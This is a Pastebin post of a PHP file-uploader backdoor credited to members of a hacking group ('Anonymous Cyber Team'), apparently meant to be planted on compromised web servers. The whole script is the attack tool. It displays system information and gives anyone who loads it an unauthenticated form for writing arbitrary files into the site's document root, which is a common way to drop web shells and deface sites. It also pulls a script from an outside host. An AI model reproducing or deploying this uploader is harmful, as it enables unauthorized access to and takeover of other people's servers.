Advertisement
mrfmr

[PHP] Uploader Home Root Priv8

May 20th, 2018
1,519
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.97 KB | None | 0 0
  1.     //Recode By Mr.Bro_Tx - Mr.FMR
  2. //Greetz : Mr.TenWap - IndoXploit - Xaisyndicate & All Member Anonymous Cyber Team
  3. <html><title>T3754K1T1 Uploader </title>
  4. <script src="http://e-mete.com/js/kdsnow.js"></script> <style> body{ background-image: url(); background-repeat: no-repeat; background-attachment: fixed; background-position: top; background-color:#000000; position: relative; background-size:100% 100vh; } .logo { width: 300px; height: 300px; margin: 0 auto; margin-top: 50px; -webkit-filter: drop-shadow(0px 0px 7px #0080FF); filter: drop-shadow(0px 0px 7px #0080FF); } .logo:hover{ width: 300px; height: 300px; -webkit-filter: drop-shadow(0px 0px 10px #0080FF); opacity:0.4; filter:alpha(opacity=40); transition: opacity .2s ease-out; -moz-transition: opacity .2s ease-out; -webkit-transition: opacity .2s ease-out; -o-transition: opacity .2s ease-out; }</style>
  5. <table width="100%" height="100%"><td align=center>
  6. <br><table width="30%" height="30%"><td align=center><img src="http://i0.kym-cdn.com/photos/images/original/000/784/180/ecf.gif" width="400" height="400"</img><br>
  7. <font color="clay">
  8. <?php
  9. echo "Croot33Rr  By T3754K1T1 - Anonymous Cyber Team<br>";
  10. echo "<b>".php_uname()."</b><br>";
  11. echo "<form method='post' enctype='multipart/form-data'>
  12.       <input type='file' name='just_file'>
  13.       <input type='submit' name='upload' value='Crootin unch <3'>
  14.       </form>";
  15. $root = $_SERVER['DOCUMENT_ROOT'];
  16. $files = $_FILES['just_file']['name'];
  17. $dest = $root.'/'.$files;
  18. if(isset($_POST['upload'])) {
  19.     if(is_writable($root)) {
  20.         if(@copy($_FILES['just_file']['tmp_name'], $dest)) {
  21.             $web = "http://".$_SERVER['HTTP_HOST']."/";
  22.             echo "sukses upload -> <a href='$web$files' target='_blank'><b><u>$web/$files?W00t</u></b></a>";
  23.         } else {
  24.             echo "gagal upload di document root Cuk.";
  25.         }
  26.     } else {
  27.         if(@copy($_FILES['just_file']['tmp_name'], $files)) {
  28.             echo " upload <b>$files</b>di folder ini";
  29.         } else {
  30.             echo "gagal upload ";
  31.         }
  32.     }
  33. }
  34. ?>
  35. </font></table></td></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement